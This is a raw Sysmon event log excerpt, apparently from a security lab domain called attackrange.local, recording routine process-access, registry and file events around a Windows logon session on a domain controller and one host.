09:21:43.404{5EBD8912-8D26-6151-8600-00000000FD01}1288C:\Windows\system32\winlogon.exeHKU\.DEFAULT\Control Panel\Desktop\MuiCached\MachinePreferredUILanguagesBinary Data 10341000x80000000000000001055144Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.295{5EBD8912-8D26-6151-8500-00000000FD01}27601144C:\Windows\system32\csrss.exe{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\winsrv.DLL+1ef0|C:\Windows\system32\winsrv.DLL+17e9|C:\Windows\system32\winsrv.DLL+1579|C:\Windows\SYSTEM32\ntdll.dll+5178f 23542300x80000000000000001055143Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.233{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CAA08AEEB6938B69BD4364905A92D9FA,SHA256=E601A76999B7372E2242C216DE34D0869D6085749E2BD11532A1FFAB3B0741A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055142Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.185{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=580B3BFFA831D78B80F0AA1512D19C4A,SHA256=DADE18E54B84F66BAAB018999273D778CCB336088316B72DE2DAF11497A6B345,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001055141Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:21:43.045{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\mouclass\Enum\NextInstanceDWORD (0x00000002) 13241300x80000000000000001055140Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:21:43.045{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\mouclass\Enum\CountDWORD (0x00000002) 13241300x80000000000000001055139Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:21:43.045{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\mouclass\Enum\1TERMINPUT_BUS\UMB\2&2c22bcc9&0&Session2Mouse0 13241300x80000000000000001055138Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:21:43.045{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\NextInstanceDWORD (0x00000002) 13241300x80000000000000001055137Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:21:43.045{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\CountDWORD (0x00000002) 13241300x80000000000000001055136Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:21:43.045{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\1TERMINPUT_BUS\UMB\2&2c22bcc9&0&Session2Mouse0 13241300x80000000000000001055135Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:21:43.029{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\kbdclass\Enum\NextInstanceDWORD (0x00000002) 13241300x80000000000000001055134Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:21:43.029{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\kbdclass\Enum\CountDWORD (0x00000002) 13241300x80000000000000001055133Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:21:43.029{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\kbdclass\Enum\1TERMINPUT_BUS\UMB\2&2c22bcc9&0&Session2Keyboard0 13241300x80000000000000001055132Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:21:43.029{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\NextInstanceDWORD (0x00000001) 13241300x80000000000000001055131Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:21:43.029{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\CountDWORD (0x00000001) 13241300x80000000000000001055130Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:21:43.029{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\0TERMINPUT_BUS\UMB\2&2c22bcc9&0&Session2Keyboard0 10341000x80000000000000001055129Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.029{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D26-6151-8600-00000000FD01}1288C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+2387f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055128Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.029{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D26-6151-8600-00000000FD01}1288C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+2380c|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055127Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.029{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D26-6151-8600-00000000FD01}1288C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+237c4|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055126Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.014{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055125Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.014{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055124Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.014{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055123Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.014{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055122Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.014{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055121Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.014{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055120Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.014{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055119Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.014{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055118Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.014{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055117Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.014{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8D26-6151-8500-00000000FD01}2760C:\Windows\system32\csrss.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+1ac1c|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001055116Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.014{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8D26-6151-8600-00000000FD01}1288C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1abf6|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001055115Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.014{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8D26-6151-8600-00000000FD01}1288C:\Windows\system32\winlogon.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+1abdc|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001055114Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.014{5EBD8912-8D26-6151-8400-00000000FD01}660912C:\Windows\System32\smss.exe{5EBD8912-8D26-6151-8600-00000000FD01}1288C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\SYSTEM32\ntdll.dll+8c63e|C:\Windows\SYSTEM32\ntdll.dll+8c3e9|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+2042|\SystemRoot\System32\smss.exe+1d5e|\SystemRoot\System32\smss.exe+1b09|\SystemRoot\System32\smss.exe+14cb|\SystemRoot\System32\smss.exe+130f|\SystemRoot\System32\smss.exe+1096|C:\Windows\SYSTEM32\ntdll.dll+5178f 154100x80000000000000001055113Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:42.993{5EBD8912-8D26-6151-8600-00000000FD01}1288C:\Windows\System32\winlogon.exe10.0.14393.3204 (rs1_release.190830-1500)Windows Logon ApplicationMicrosoft® Windows® Operating SystemMicrosoft CorporationWINLOGON.EXEwinlogon.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e72SystemMD5=DEA4CE12F24601830083126E18A2C7C9,SHA256=F002F8C2EA49D21F242996E3D57F5FDD7995FE6DB524BB69BBD7F190CC0211A9,IMPHASH=3CF10D94C117DB4F6E9D523B93429D6D{5EBD8912-8D26-6151-8400-00000000FD01}660C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000001d4 0000007c 23542300x8000000000000000980873Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:44.400{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7DD85131C0FCE8204EE85B05F0C9B342,SHA256=99E6E0897244DA07CD96FA05914D6C6DB62F9FAFD6C30BD9E7F19470EC9DE926,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055412Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.983{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055411Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.983{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055410Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 